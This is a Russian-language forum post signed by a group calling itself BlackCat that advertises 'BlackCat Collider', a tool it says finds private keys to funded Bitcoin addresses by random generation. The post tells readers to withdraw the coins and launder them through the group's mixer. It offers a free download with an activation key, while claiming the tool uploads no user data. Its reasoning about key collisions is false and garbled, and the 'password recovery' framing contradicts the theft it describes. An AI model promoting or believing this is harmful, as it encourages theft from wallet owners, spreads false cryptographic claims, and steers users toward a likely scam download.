Математики уверяют, что подобрать приватный ключ практически невозможно, ибо нахождения 1 конкретного адреса составляет 2^256 степени (примерно равно 10^77), что и считается практически невозможным, ибо это настолько большое число, что почти соответствует количеству атомов во вселенной. Собственно, только это гигантское число вариантов и обеспечивает сохранность криптовалюты от посягательств извне.

Но в этой теории есть несколько моментов! Во-первых: в приватном ключе 64 знака, а в адресе только 40, поэтому у каждого адреса существует 2^(256/64*40=96), т.е. 2^96 (10^29) работающих приватных ключей. В итоге хеширования и конвертирования приватный и открытый ключи и вовсе имеют значения короче - 52 и 34(бывают и даже 26) знаков. А значит, что у каждого биткоин-адреса есть 100 000 000 000 000 000 000 000 000 000 работающих приватных ключей!
Во-вторых: нам не нужен конкретный адрес. В блокчейне биткоина прямо сейчас есть более 40 000 000 адресов с ненулевым балансом. Даже просто завести новый кошелёк для себя, вам придётся воспользоваться генератором ключей, который вполне может тут же сгенерировать уже существующий в блокчейне адрес, на котором окажется положительный баланс.

Наша команда давно работает в этом направлении и готова представить вашему вниманию собственную программу. BlackCat Collider — это продвинутый и чрезвычайно быстрый инструмент для восстановления паролей для зашифрованных кошельков Bitcoin.

BlackCat Collider по специальному алгоритму генерирует случайный закрытый ключ, вычисляет публичный ключ и адрес, а затем сравнивает его с адресами из файла открытых ключей bitcoin из списка загруженных в программу адресов. В случае совпадения - адрес, закрытый/открытый ключи сохраняются в текстовый файл в каталоге программы. По закрытым ключам Вы можете зайти в кошелек и вывести BTC с баланса на созданный Вами в нашем сервисе кошельке, а после уже на свой собственный, прогнав данные BTC через наш собственный миксер.
Работа программы включает в себя комплексную комбинацию паролей, охватывающую все возможные элементы пароля (прописные / строчные буквы, цифры / специальные символы), чтобы не пропустить ни одного символа. BlackCat Collider основан на многопоточных процессах, используя вычислительные мощности CPU / GPU.

https://i.imgur.com/vF2jg1gm.png

На данный момент мы предоставляем бесплатно доступ к работе программы на месяц! Чтобы начать, вам необходимо на нашем сайте скачать приложение на вашу платформу, в приложении ввести ключ активации xz18-4y23-e434-au29. Далее вам нужно скачать любой файл с перечнем адресов, вставить его в программу, выбрать размер нагрузки и нажать старт!

BlackCat Collider версии 1.0
Следует отметить, что это программное обеспечение работает только с доступом в интернет, для проверки актуальности в Блокчейне!
Но программа не загружает какую - либо информацию о ВАС, пользователи могут быть спокойны! Не отключайте соединение, чтобы запустить процесс дешифрования для восстановления пароля биткойна! Мы не дадим никому шанса украсть ВАШИ деньги, также мы защитим конфиденциальность наших клиентов.
BlackCat Collider работает с Windows 11, 10, 8, 7, MacOS и Android.
Он также доступен в переносимой форме для 64-разрядных версий Windows, поэтому он не требует установки!

Люди чистой воли и принципов, объединившиеся в коллектив BlackCat (попросту группировка BlackCat)
О нас говорит весь МИР!

Отредактировано BlackCat (2022-08-21 23:01:11)